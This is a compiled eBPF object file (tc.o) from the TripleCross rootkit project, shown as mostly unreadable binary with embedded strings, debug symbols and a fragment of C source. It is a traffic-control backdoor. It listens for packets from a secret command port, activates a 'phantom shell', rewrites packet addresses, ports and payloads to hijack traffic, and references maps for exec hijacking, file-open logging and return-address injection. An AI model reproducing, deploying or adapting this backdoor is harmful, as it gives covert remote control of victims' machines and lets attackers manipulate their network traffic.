TripleCross/apps/tc.o

595 lines
50 KiB
Plaintext

ELF<00><00><>@@<00>aePagL<00>x<00>X<00>s<1A><><00>ETH
c<1A><><00><><00><><EFBFBD><EFBFBD><EFBFBD>
qq qr dL<00>IP
c<1A><><00><><00><><EFBFBD><EFBFBD><EFBFBD><00><00><00><00>y "<00>Y<00>s<1A><><00>x
k<1A><><00> %llc<1A><>datalen:{<1A><>: %llx, {<1A><>lx, data{<1A><>, ip: %l{<1A><>IP CHECK{<1A><><00><><00><><EFBFBD><EFBFBD><EFBFBD>/<00><><00>t<00><00><>qqV<01><><00>q6<00>Q <00>s<1A><><00>K
k<1A><>TCP CHEC{<1A><><00><><00><><EFBFBD><EFBFBD><EFBFBD> <00><>i<>V @<00>CK
c<1A><>PORT CHE{<1A><><00><><00><><EFBFBD><EFBFBD><EFBFBD> <00><><00>xk<1A><>_end:%ll{<1A><>lx, data{<1A><> data:%l{<1A><> bounds:{<1A><>Detected{<1A><><00><><00><><EFBFBD><EFBFBD><EFBFBD>*<00>s<00>T<00>cp:%llx
{<1A><>:%llx
t{<1A><>%llx
ip{<1A><>:
eth:{<1A><> headers{<1A><>Detected{<1A><><00>s<1A><><00><><00><><EFBFBD><EFBFBD><EFBFBD>1<00>s<00><><00><><00>ixqqcX<>iy.<00>u
k<1A><>p_ihl: %{<1A><>4: %u, i{<1A><>cp_doff*{<1A><>n: %u, t{<1A><>ip_totle{<1A><><00>s<1A><>isquit.tT<dT<<00><00><><00><><EFBFBD><EFBFBD><EFBFBD>+<00><00>a<00><00>'t T <<00><1C>a<>X<EFBFBD>dT<<00>
kz<6B><7A>size: %u{<1A><>PAYLOAD {<1A><><00><><00><><EFBFBD><EFBFBD><EFBFBD><00><><00><00>{<1A><><00><><00><><EFBFBD><EFBFBD><00><00><00>c<1A><><00>{<1A><>{<1A><>{<1A><>{<1A><>{<1A><>{<1A><>{<1A><>{<1A><>{<1A><>Ukz|<7C><00> yetcx<>T active{p<>shell NO{h<>Phantom {`<60><00><>`<60><><EFBFBD><EFBFBD>1<>a<>V<00>ow
c<1A><> right n{x<>T active{p<>shell NO{h<>Phantom {`<60><00><>`<60><><EFBFBD><EFBFBD>$<1D><00> c<><63><EFBFBD>a<>c<1A><>i<>k<1A><>i<>k<1A><>i<>k<1A><>i<> k<1A><>i<>
k<1A><>i<>k<1A><>i<>k<1A><>i<>k<1A><>i<>k<1A><>i<> k<1A><>i<>k<1A><>i<>k<1A><>i<>k<1A><>i<>(k<1A><>i<>&k<1A><>i<>$k<1A><>i<>"k<1A><>i<>0k<1A><>i<>.k<1A><>i<>,k<1A><>i<>*k<1A><>i<>8k<1A><>i<>6k<1A><>i<>4k<1A><>i<>2k<1A><>i<>@k<1A><>i<>>k<1A><>i<><k<1A><>i<>:k<1A><>i<>Hk<1A><>i<>Fk<1A><>i<>Dk<1A><>i<>Bk<1A><><00><><00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><00><><EFBFBD><EFBFBD><00><00><00><>
f <00><><EFBFBD><EFBFBD><EFBFBD>ap
cp<>update m{h<>Fail to {`<60><00><>`<60><><EFBFBD><EFBFBD><00><00>x
k<1A><>P:%x P:%{<1A><>, A:%i I{x<>tive now{p<>shell ac{h<>s<><73><EFBFBD> Phantom {<7B>`<60>i<>a<>a<><00><>`<60><><EFBFBD><EFBFBD>+<00>oad: %s
{x<>ram payl{p<>shell pa{h<>{<7B>`<60><00>s<1A><><00> <00><>`<60><><EFBFBD><EFBFBD>!<00>s<00>a<>c<1A><>i<>k<1A><><00><><00><><EFBFBD><EFBFBD><EFBFBD>a<00><00><00><00><><00><><EFBFBD><EFBFBD><EFBFBD>a<00>$<00><00>s<>n<EFBFBD><00>u
kl<><00>p: %ch<>offset i{`<60><00><>`<60><><EFBFBD><EFBFBD><00><00>a<><61><EFBFBD>a<><61><EFBFBD><00>a<00><00><00>
f
<00><><EFBFBD><EFBFBD><EFBFBD>s<1A><><00> %d
c<1A><>hecksum:{x<>ute l3 c7<00><><00><><EFBFBD><EFBFBD><EFBFBD>a<00><00><00><00> f<00><><EFBFBD><EFBFBD>ip: %d
{<1A><>ination {x<>ite dest{p<>o overwr{h<>Failed t{`<60><00><>`<60><><EFBFBD><EFBFBD>(&<00>s<>p<EFBFBD>ort: %u
{h<>offset p{`<60><00><>`<60><><EFBFBD><EFBFBD><00>$<00>i<><69><EFBFBD>i<><69><EFBFBD><00>a<00>2<00><00> f<00><><EFBFBD><EFBFBD>s<EFBFBD><73><EFBFBD><00> %d
c<1A><>hecksum:{x<>ute l4 c{p<>o recomp{h<>Failed t{`<60><00><>`<60><><EFBFBD><EFBFBD>%<00><00>$<24><00><><00><><EFBFBD><EFBFBD><EFBFBD>a<00>$<00><00><00> f<00><><EFBFBD><EFBFBD><EFBFBD>
k<1A><>port: %d{<1A><>ination {x<>ite dest{p<>o overwr{h<>Failed t{`<60><00><>`<60><><EFBFBD><EFBFBD>*<00><>ab@<00>a<00><00>&f<00><><EFBFBD><EFBFBD><EFBFBD>s<1A><><00> %d
c<1A><>a tail):{<1A><>cket (vi{x<>e the pa{p<>o enlarg{h<>Failed t{`<60><00><>`<60><><EFBFBD><EFBFBD>-<00><><00><00>a<00><00>'f <00><><EFBFBD><EFBFBD>s<EFBFBD>t<EFBFBD><00>ata
cp<>o pull d{h<>Failed t{`<60><00><>`<60><><EFBFBD><EFBFBD><00>aePadL<00>C<00>S<00>sd<><00>ETH
c`<60><00><>`<60><><EFBFBD><EFBFBD><00><><00>A"<00>Q<00>s<1A><><00>x
k<1A><><00> %llc<1A><>datalen:{<1A><>: %llx, {x<>lx, data{p<>, ip: %l{h<>IP CHECK{`<60><00><>`<60><><EFBFBD><EFBFBD>/<00><00><><00>B6<00>R <00>sj<><00>K
kh<>TCP CHEC{`<60><00><>`<60><><EFBFBD><EFBFBD> <00><><03><><04><><01><>-T<><54>iB.tT<iA<00>!qBdT<!&<01><>?<00>B@<00>%<25><>E<00><05><>@ah<00><><EFBFBD><EFBFBD><EFBFBD> <00>q<0F>q q   <>@<00>q<0F>qq<00><>   <00><><00><><EFBFBD><EFBFBD>&p<>><00>s<1A><>i bytes
{<1A><>riting %{x<>et %i, w{p<>oad offs{h<>New payl{`<60><00><>`<60><><EFBFBD><EFBFBD>)<00><><00><><00><00>a<00><><00>s<00><><00><00> f<00><><EFBFBD><EFBFBD><EFBFBD>s<1A><>oad: %d
{x<>ite payl{p<>o overwr{h<>Failed t{`<60><00><>`<60><><EFBFBD><EFBFBD>!<19>aePadL<00>C<00>Sg<><00>A"<00>Qn<><00>A6<00>Q<00><>iG<00>@<00>u<00>kZ^<5E>iC<00>a<00><00>T<00><00>
f<00><><EFBFBD><EFBFBD><00><><00>%i
cp<>ot len: {h<>New ip t{`<60>T<00><><00><>`<60><><EFBFBD><EFBFBD><00>s<00><00><>^<5E><><EFBFBD><EFBFBD>a<00><00><00><00> f<00><><EFBFBD><EFBFBD><EFBFBD>
k<1A><><00>: %dc<1A><>otal len{x<>ite ip t{p<>o overwr{h<>Failed t{`<60><00><>`<60><><EFBFBD><EFBFBD>&<00><><00>s<1A><><00>e
k<1A><>g routin{x<>hijackin{p<> packet {h<>Finished{`<60><00><>`<60><><EFBFBD><EFBFBD>#<00><><00>a<>Pa<>L<00>
k<1A><><00>lledc<1A><>ifier ca{<1A><>ss class{<1A><>TC ingre{<1A><><00><><00><><EFBFBD><EFBFBD><EFBFBD><00><00><><00>g <00>s<1A><><00>ETH
c<1A><><00><><00><><EFBFBD><EFBFBD><EFBFBD><00>+q<> q<> dL<00>IP
c<1A><><00><><00><><EFBFBD><EFBFBD><EFBFBD><00><00><>"<00>b<00>s<1A><><00>x
k<1A><><00> %llc<1A><>datalen:{<1A><>: %llx, {<1A><>lx, data{<1A><>, ip: %l{<1A><>IP CHECK{<1A><><00><><00><><EFBFBD><EFBFBD><EFBFBD>/<00>s<00><><00>e<00><00><00>q<><00>s<1A><><00>TCP
<00><><00><>6<00>a <00>s<1A><><00>K
k<1A><>TCP CHEC{<1A><><00><><00><><EFBFBD><EFBFBD><EFBFBD> <00><00><>{*<2A><>i<>$ #(CK: %u
{<1A><>PORT CHE{<1A><><00><00><><00><><EFBFBD><EFBFBD><EFBFBD><00><00>xk<1A><>_end:%ll{<1A><>lx, data{<1A><> data:%l{<1A><> bounds:{<1A><>Detected{<1A><><00><><00><><EFBFBD><EFBFBD><EFBFBD>*<00><><00>d<00>cp:%llx
{<1A><>:%llx
t{<1A><>%llx
ip{<1A><>:
eth:{<1A><> headers{<1A><>Detected{<1A><><00>s<1A><><00><><00><><EFBFBD><EFBFBD><EFBFBD>1<00><><00>ty<><79><EFBFBD><00>i<>{<1A><>q<>c<1A><>i<>.<00>s<1A><><00>u
k<1A><>p_ihl: %{<1A><>4: %u, i{<1A><>cp_doff*{<1A><>n: %u, t{<1A><>ip_totle{<1A><>i<>i<>.tq<>T<dT<<00><00><><00><><EFBFBD><EFBFBD><EFBFBD>+<00>y<><79><EFBFBD>tT<y<><79><EFBFBD><00>q<00>a<><61><EFBFBD>dT<i<>.wW<'<00>1q<00>a"<00>s<1A><><00>x
k<1A><><00>:%llc<1A><>data_end{<1A><>e:%llx, {<1A><>load_siz{<1A><>llx, pay{<1A><>ayload:%{<1A><>CHECK, p{<1A><>PAYLOAD {<1A><><00><><00><><EFBFBD><EFBFBD><EFBFBD>?<00>t<00>e<00>P<><00><><00><00>'<00>
k<1A><>size: %u{<1A><>PAYLOAD {<1A><><00><><00><><EFBFBD><EFBFBD><EFBFBD><00>s<00>?<3F>PORT CHECK
offset ip: %u
ETH
TCP
TCP CHECK
Phantom shell NOT active yet
Phantom shell NOT active right now
Fail to update map
Phantom shell active now, A:%i IP:%x P:%x
Phantom shell param payload: %s
Failed to overwrite destination ip: %d
offset port: %u
Failed to recompute l4 checksum: %d
Failed to overwrite destination port: %d
Failed to enlarge the packet (via tail): %d
Failed to pull data
New payload offset %i, writing %i bytes
Failed to overwrite payload: %d
Failed to recompute l3 checksum: %d
New ip tot len: %i
Failed to overwrite ip total len: %d
Finished packet hijacking routine
TC ingress classifier called
IP CHECK, ip: %llx, data: %llx, datalen: %llx
PORT CHECK: %u
Detected bounds: data:%llx, data_end:%llxDetected headers:
eth:%llx
ip:%llx
tcp:%llx
ip_totlen: %u, tcp_doff*4: %u, ip_ihl: %u
PAYLOAD CHECK, payload:%llx, payload_size:%llx, data_end:%llx
PAYLOAD size: %u
GPL<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Q<00>V<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><00>U<><00>U<>`UPUX`U<>XU<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><00>W<><00>WPTX<00>T<><00>T<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><00>W<><00>WPTX<00>T<><00>T<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><00><00>ɠ)<29><><00>z<><00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><00>@XpPSX<00>S<>pS<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><00>XYXpQ<>Q(<00>t"<22><00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><00>PX8<00>Q<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> 1<> <00>z<><00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>P8 X<> hX<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>X
<00>
P<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> 0 Q<> @z<><00><00>z<><00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>0 P Q<><00>z<><00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>8  z<><00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>8 <00>@<40><00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>h 8 z<><00> <00>z<><00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>0 <00>P<><00>P<>P0PP<00>P<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><00><00>X<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><00><00>y2!<21><><00>y3!<21><><00>Y<>y1!<21><00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><00>z<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Q`X<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>`V<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>`Y<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>`Y<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>08ɠ)<29>8`z <00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>`XWh8W<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><00>RxR<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>`<00>S<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><00>`W<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><00><00>S<><00>S%U4I?: ;I!I7 $> $ > 4I?: ;  : ; I: ; 8
I !I7 I: ; 4I: ; I'I&I4I: ; : ; I: ;8  I: ;<05>8  : ;<05> I: ;8  : ; : ;&I : ; (I : ; I: ; 8 .@<18>B: ; 'I?!: ; I"4: ; I#4: ; I$4: ; I% & U'4: ;I(.@<18>B: ;'I?): ;I*4: ;Iy -Yo@<01> LSx}<07>oP  K <09><00>L <09><00>M <09><00>N <09><00>O
<EFBFBD><03>S<05>
<EFBFBD><03> S
<EFBFBD> <0C><00><05>
<EFBFBD>8 <09>? <09><00>! <09>D" <09>V# V$ <00>%0
L O<00><05>LS+wW q R <09><00>S <09><00>T <09><00>U <09><00>V
<EFBFBD>UH( <09>D) B<00>* O<00>+LS@<07>_ <08> Z <09><00>[ <09><\ <09>N] <09>S^
A<03> S
D
X<08>/ <09><00>0 <09>y1<03>S<08>' <09>O(<00>e l ` <09><00>a <09><b <09>Nc <09><00>d
<EFBFBD>P4 <09><00>5 <09>6SC* +/+4<07>Ko <08>(i <09><00>j <09><00>k <09><00>l <09><00>m <09><00>n
<EFBFBD><08>L <09><00> <09>O <09>/ <09><00>
<07><00>x x s <09><00>t <09><00>u <09><00>v <09>w
!c(<
<00>= <00>> 1<00>? ><00>@ JrA [rB$ <0C>U<07><00><02>  | <09><00>} <09><00>~ <09><00> <09><00><02>
<EFBFBD><08>G <09><00>H<08> <09>* <09><00>  <09>/
 <09>1  <09>8 <05><05>LS O<06>
TelD#
qL,<00>
<EFBFBD>e<0F>D
<EFBFBD>a<00>W>DXBDYKDZPD[ ^D\gD]tD^}D_<14>D` <14>Da$<14>Db(<14>Dc,<14>hd0<14>DeD<14>DfH<14>DgL<14>DhP<14>DiT<14>DlX<14>Dm\<14>Dn`<14>todtpt Dq<10>Dr<10>#Du<10>v<08>v-<00>v<14><00>w<10><14>Dx<10><14>Dy<10>Fz<08>z<14><00>zXD{<10>DSDS
<EFBFBD><13>8<07>7<00><07>C<00><07>I<00><07>T<00><07>a<00><07>o<00><07>x<00><07> <14><00><07>
<14><00><07> <14><00><07><07> <07>'<07><07><14><00><07><14><00><07>P<07> <07><14>t<07><14>t<07><14>D<07>0<14><00><07>4 /= 1\ <0C><00> D<00>
<EFBFBD>OP<07>D<07><14>D<07><14>D<07>^D<07> KD<07><14>D<07>D<07>t<07>+D<07>,D<07>0(D<07>40t<07>88D<07>H>r<07>L k<00> 1
<EFBFBD> <0E> <0F> <0F> 
<EFBFBD>  <00> G
<EFBFBD> e<0F> <0F> <0F> <0F><12><00> <06>
<EFBFBD> e<0F> D<0F> D <0A>
<06>
e<0F>D<0F><0F><0F> <0A>3
<06>
8
e<0F>D<0F> D<0F><12>
<12>o
<06>
t
e<0F>D<0F>O (<1D>(4@ LXdo!|)<1D>.<1D>/<1D>2<1D>3<1D>\<1D>^<1D>b<1D>g<1D>l<1D><00><00><00>%<00>6<00>B<00>P<00>O<07>\dpz
h <08>
V<1F><00>
X<1F><00>
Y <09><00>
` <09><00>
a <09><00>
b <09><00>
c <09><00>
d ^<00>
e <09><00>
f
<09><00>
g <09><00>
h <0C><00>
   <09><00>  <09><00>  <09><00>  <09><00> <1F><00>  <1F><00>  <1F><00> ! <1F><00> " <1F><00> # <1F><00> $ <1F><00> %  <00> &  <00> '  <00> (  <00> 7 <09><00> 8  <00> 9%  /7 ( <00>ZB <18>!{ <18>"<03><>o Y<>#F<00><1A> #<23> 2#W<00><19> #"<00> +c #<23><00> 6 $+><3E>$<24>J?#<23><00> GD#B<00>W<>#<23><00> X<>#<23><00> l<>#<00> rD#a<00> s<>#<23><00> {D#<23><00> zD#<00> }<7D>$<24> wD$
vD$
uD$,
tD#]<
<01><>#<23>@
<01>D$J
<01>D#<23>[
<01><>$g
<01>D%8("<03><>g !6%<25> #<23>g &@&"<03><>g -B%@"<03><>g 8N%h@"<03><>g @Z&0"<03><>g Df&<26>"<03><>g Er&<26>"<03><>g H~&<26>"<03><>g S<>%<25><00>"<02>g \<5C>%P<00>"<02>g c<>%h
X"<02>g n<>& "<02>g p~&<26>"<02>g q<>&<26>"<02>g <>%<25> <00>"<02>g <01><>%h`"<02>g <01><>%@"<02>g <01><>%<25><00>"<02>g <01>f%<25><00>"<02>g <01><>%<25>h"<02>g <01>%<25>x#G
͹%P<00>"<02>g <01>%8<00>"<02>g ۺ%<25>x"<02>g <01><>%`<00>"<02>g <01>%<00>'<02>g &(`ZT  <01>)<29>{  <01>*<00> <01> *4 2*g<00>
<01> *<2A><00> c *+<00> ' *qy
.<01>*<2A><00> 8D*<2A><00>:?&<26>'<02> g  <01>%<25>'<02> g 6%00*<2A>g @&'<02> g B%<25>'<02> g "6%<25>X'<02> g )N%8H'<02> g 0V&@'<02> g 4f&<26>'<02> g 5r&<26>'<02> g 9~%<25>'<02> g <p&<26>'<02> g B<01>LSLS/LS LS LS*LS1LS+LSLSLS$LSLS!LSLS(LSLS%LS-LSLS)LS&LS#
7<08>  <0A> <09> d <0A> <09> d <0A> <09> <00> <0A> 1SLS?<00><00><00><00><00>p8@<00><00>(0p@`8@P<00><00><00><00>
<00> <00> @ H p x <00> <00> <00> <00>  <00> <00> <00> <00><00><00><00>(0X<00>H<00><00> H<00><00>8 8<00>8@`<00>`Ubuntu clang version 12.0.0-3ubuntu1~21.04.2/home/osboxes/TFG/src/ebpf/include/bpf/tc.c/home/osboxes/TFG/src_licensechar__ARRAY_SIZE_TYPE__fs_opentypeintmax_entrieskeylong long unsigned int__u64valuebuffdpidunsigned int__u32program_namefilenameis_sudofs_open_datafs_priv_openexec_var_hijack_activehijack_stateargv0exec_var_hijack_active_dataexec_var_priv_hijack_activebackdoor_packet_log_32last_packet_modifiedtrigger_arrayseq_rawtrigger_32_tbackdoor_packet_log_data_32backdoor_priv_packet_log_32backdoor_packet_log_16src_portunsigned shorttrigger_16_tbackdoor_packet_log_data_16backdoor_priv_packet_log_16backdoor_phantom_shellactived_ipd_portpayloadbackdoor_phantom_shell_datapinningbackdoor_priv_phantom_shellinj_ret_addresslibc_syscall_addressstack_ret_addressrelro_activegot_addressgot_offset__s32paddinginj_ret_address_datainj_priv_ret_addressfs_dir_logdirent_infod_inolong long intd_offd_reclend_typeunsigned chard_namelinux_dirent64fs_dir_log_datafs_priv_dir_logbpf_trace_printklong 
intbpf_skb_pull_datalenpkt_typemarkqueue_mappingprotocolvlan_presentvlan_tcivlan_protopriorityingress_ifindexifindextc_indexcbhashtc_classiddatadata_endnapi_idfamilyremote_ip4local_ip4remote_ip6local_ip6remote_portlocal_portdata_metaflow_keysnhoff__u16thoffaddr_protois_frag__u8is_first_fragis_encapip_proton_proto__be16sportdportipv4_src__be32ipv4_dstipv6_srcipv6_dstflagsflow_labelbpf_flow_keyststampwire_lengso_segsskbound_dev_ifsrc_ip4src_ip6dst_portdst_ip4dst_ip6staterx_queue_mappingbpf_sockgso_size__sk_buffbpf_map_lookup_elembpf_map_update_elembpf_skb_load_bytesbpf_l3_csum_replacebpf_skb_store_bytesbpf_l4_csum_replacebpf_skb_change_tailIPPROTO_IPIPPROTO_ICMPIPPROTO_IGMPIPPROTO_IPIPIPPROTO_TCPIPPROTO_EGPIPPROTO_PUPIPPROTO_UDPIPPROTO_IDPIPPROTO_TPIPPROTO_DCCPIPPROTO_IPV6IPPROTO_RSVPIPPROTO_GREIPPROTO_ESPIPPROTO_AHIPPROTO_MTPIPPROTO_BEETPHIPPROTO_ENCAPIPPROTO_PIMIPPROTO_COMPIPPROTO_SCTPIPPROTO_UDPLITEIPPROTO_MPLSIPPROTO_ETHERNETIPPROTO_RAWIPPROTO_MPTCPIPPROTO_MAXBPF_ANYBPF_NOEXISTBPF_EXISTBPF_F_LOCKihlversiontostot_lenidfrag_offttlcheck__sum16saddrdaddriphdrsourcedestseqack_seqres1dofffinsynrstpshackurgececwrwindowurg_ptrtcphdrlong unsigned int__uint16_tclassifier_egressclassifier_ingress____fmtps_new_dataskbethh_desth_sourceh_protoethhdriptcppayload_sizeps_dataerrnew_ipnew_dportold_ip_daddrincrement_lenold_dportoffset_tcp_checksumoffset_ip_checksumoffset_dportoffset_ip_daddrretoffsetiipayload_char_lennew_tot_lenoffset_ip_tot_lendest_port<00><>  <00>  @ 6LRY
^ @e Pm z<00> @<00>(<00><00>@<00><00><00><00><00><00><00>8<00><00>@<00>`<00><00> <00> 
   <00><00>@<00><00><00><00>-5H<00>Q ^ @d <00><00>@<00><00><00><00><00>!<00><00><00># <00><00>
"<00> <00><00>@<00><00><00> <00>$'<00><00>) :G (P <00><00>@<00><00><00>&<00>l*-<00>(<00><00>@<00><00><00><00><00>.<00>. <00><00> <00><00>@<00><00><00>,<00>/2&32A4G@M <00>V5<00>]6<00>d@r <00> <00><00>@<00><00><00>1<00><00>7:<00> <04><00><00> <00>@<00>`<00><00><00><00><00><00><00><00><00><00> @`;<00> !@,`1<00>:<00>B<00>I<00>T^< i<<00>s @<00>`=<00><00><00><00><00> ?@<00><00><00>>I<00>@J <00>9<00> A <00>9<00> C vE(  % + 0 8 <00>F<00><00>int__ARRAY_SIZE_TYPE____u64long long unsigned intbackdoor_phantom_shell_dataactived_ipd_portpayloadunsigned intunsigned shortcharbackdoor_priv_phantom_shelltypemax_entrieskeyvaluepinningbackdoor_phantom_shellfs_open_databuffdpidprogram_namefilenameis_sudo__u32fs_priv_openfs_openexec_var_hijack_active_datahijack_stateargv0exec_var_priv_hijack_activeexec_var_hijack_activebackdoor_packet_log_data_32last_packet_modifiedtrigger_arraytrigger_32_tseq_rawbackdoor_priv_packet_log_32backdoor_packet_log_32backdoor_packet_log_data_16trigger_16_tsrc_portbackdoor_priv_packet_log_16backdoor_packet_log_16inj_ret_address_datalibc_syscall_addressstack_ret_addressrelro_activegot_addressgot_offsetpadding__s32inj_priv_ret_addressinj_ret_addressfs_dir_log_datadirent_infolinux_dirent64d_inod_offd_reclend_typed_namelong long intunsigned charfs_priv_dir_logfs_dir_log__sk_bufflenpkt_typemarkqueue_mappingprotocolvlan_presentvlan_tcivlan_protopriorityingress_ifindexifindextc_indexcbhashtc_classiddatadata_endnapi_idfamilyremote_ip4local_ip4remote_ip6local_ip6remote_portlocal_portdata_metatstampwire_lengso_segsgso_sizeflow_keysskskbclassifier_egressclassifier/egress/home/osboxes/TFG/src/ebpf/include/bpf/tc.cint classifier_egress(struct __sk_buff *skb){ void *data_end = (void *)(__u64)skb->data_end; void *data = (void *)(__u64)skb->data; if ((void *)eth + sizeof(struct ethhdr) > data_end){ bpf_printk("ETH\n"); if(eth->h_proto != htons(ETH_P_IP)){ bpf_printk("IP\n");} if ((void *)ip + sizeof(struct iphdr) > data_end){ bpf_printk("IP CHECK, ip: %llx, data: %llx, 
datalen: %llx\n", ip, data, data_end); if(ip->protocol != IPPROTO_TCP){ if ((void *)tcp + sizeof(struct tcphdr) > data_end){ bpf_printk("TCP CHECK\n"); __u16 src_port = ntohs(tcp->source); if(src_port == CC_CLIENT_SECRET_COMMANDING_PORT_DEFAULT){ bpf_printk("PORT CHECK\n"); bpf_printk("Detected bounds: data:%llx, data_end:%llx", data, data_end); bpf_printk("Detected headers: \n\teth:%llx\n\tip:%llx\n\ttcp:%llx\n", eth, ip, tcp); __u32 payload_size = ntohs(ip->tot_len) - (tcp->doff * 4) - (ip->ihl * 4); bpf_printk("ip_totlen: %u, tcp_doff*4: %u, ip_ihl: %u\n", ntohs(ip->tot_len), tcp->doff*4, ip->ihl*4); bpf_skb_pull_data(skb, 0); bpf_printk("PAYLOAD size: %u\n", payload_size); __u64 key = 1; struct backdoor_phantom_shell_data *ps_data = (struct backdoor_phantom_shell_data*) bpf_map_lookup_elem(&backdoor_phantom_shell, &key); struct backdoor_phantom_shell_data ps_new_data = {0}; if(ps_data == (void*)
<EFBFBD><00><00><00><05><00><00><03><00><00><00><00><03><00><00><00><00>,<00><00>.<11><00><00>.<06><00><00>b<03><00><00><00><00>b<03><00><00><00> <09><00><00><00><05><00><00><00><12><00><00><00><06><00><03>@<00>P<00>,<13>X<00>R<05>h<00><00><00><00><00>p<00><00><00><00><00><00>@<00>KCH<00>K2`<00><00> 8<00><00>@<00><00> P<00> Dh<00>K7<00><00>K*<00><00>KG<00><00>K<<00><00> L<00><00><00><00><00> L<00>O \(<00><00>0<00>_ V`P<00><00> (d<00><00>"
h<00><00><
p8<00>l
<14>@<00>l
<0B>P<00><00>
<03><00><00><00>
<15><00><00><00>
<1E><00><00><00>
<13><00><00><00>
<20><00><00>
<15><00>& <02>
<00><00>
<15>(
<00>d <0C>H
<00>& 1<>X
<00><00> <05>h
<00><00> <03><00>
<00><00> <02><00> <00>Y <02><00> <00><00> <02> <00>Y <02> <00><00> <1A> <00><00> <08>( <00><00> <1D>0 <00><00> <08>@ <00><00> <02>H <00><00> <02>p <00><00> <02>x <00>) <02><00> <00>l <02><00> <00><00> <02><00> <00>l <02> <00><00> 9 <00><00> G <00><00> 0 <00><00> @ <00><00> <00> <00> <00><00> <00> <00>Xh<00><00>,<00><00><00>60<00><00><00>A0<00><00><00>0<00><00><00> 4<00>"8@<00><00><00>^D<00><00><00> H<00><00><00>L<00><00><00>&\<00><00><00>)\<00><00><00>\<00><00><00> `<00><00>(d<00><00>lp<00><00><00>t<00><00><00>x<00><00>!<21><00><00><1D><00><00><12>(<00><00><06>8<00>p<00>.<11><00><00>.<06><00><00>X<00><00><12>h<00><00><06>x<00><00><00> <15><00><00>H<05><00>8<00>H<05>P<00>lX<00>`<00>l<00><00><00>8<00><00><00>8<00><00><00>8<00><00><00>8<00><00><00>4<00><00><00>4<00><00><00>8<00><00><00>8<00><00><00>8<00><00><00>8<00><00>$PP<00>`<00>gd0<00><00> h8<00><00>l<00><00><00>!<21><00><00><00>|<00><00><00><12><00><00><00><06><00><00>.<11><00>.<06><00><00><12>(<00><00><06>H<00><00><16>`<00><00><08>h<00>-:<3A>p<00>-<08><00><00><00> <06><00><00><00><02>(<00><00><08>P<00><00> <06>`<00><03><00>W<00>5<00><00>$<00>E',<00>u#( <00><00>0<00><00><00><00><00>0<00><00><00>D<00><00><00>D<00><00><00> H<00><00><00><00>
T <00><00>T0<00>\@<00>H<00>\`<00>.tp<00>.t<00><00>bx(<00>0<00>bxX<00>,<01>h<00><00> <09>p<00><00><05><00><00><03><00><00><00><12><00><00><00><06><00><00><03><00>)<14> <00>N<05>8<00>y<03><00><00><00><02>H<00><00><02><00><00><00><02><00><00><00><02><00>KC<>(<00>K2<>8<00><00><05><00><00><02> <00><00><05>8<00>K7<>X<00>K*<2A>p<00>KG<><00><00>K<<3C><00><00><00>&<26><00><00><00>*<2A><00><00><00><1F><00><00><00><15><00><00><00><06><00><00><03><00><00> <00><00> 8<00> @<00> zR|  <00>4`.R<01> ebpf/include/bpf/usr/include/asm-genericebpf/include/bpf/../../../common/usr/include/bpf/usr/include/linux/usr/include/netinet/usr/include/x86_64-linux-gnu/bitstc.cdefs.hint-ll64.hc&c.hstruct_common.hbpf_helper_defs.hbpf.htypes.hin.hip.htcp.htypes.hif_ether.h '
"#'.`  ! _X
